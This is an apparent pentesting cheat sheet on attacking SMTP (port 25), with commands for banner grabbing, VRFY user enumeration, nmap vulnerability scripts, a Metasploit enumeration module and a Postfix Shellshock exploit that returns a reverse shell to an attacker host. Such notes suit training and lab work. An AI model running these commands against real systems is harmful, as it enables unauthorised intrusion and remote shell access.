SMTP 25

#Banner grab

nc -nv 10.11.1.217 25
VRFY root
VRFY fuckoff

#Telnet

telnet 192.168.1.107 25

#NMAP

locate .nse | grep smtp
nmap --script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.10.10.10

or:

sudo nmap --script "smtp-*" 10.11.1.217

#Metasploit

use auxiliary/scanner/smtp/smtp_enum

#Postfix Shellshock

sudo searchsploit -m linux/remote/34896.py 
#If this one fails there is an automated exploit on Github


https://github.com/3mrgnc3/pentest_old/blob/master/postfix-shellshock-nc.py


#Automates the process and spawns a shell for you:

sudo chmod +x smtpExploit.py

Usage: smtpExploit.py <target-ip> <valid-email> <lhost> <lport>

python2 smtpExploit.py 10.11.1.231 useradm@mail.local 192.168.119.177 1234

Shell

PreviousTelnet 23 - 2323 NextDNS 53

Last updated 2 years ago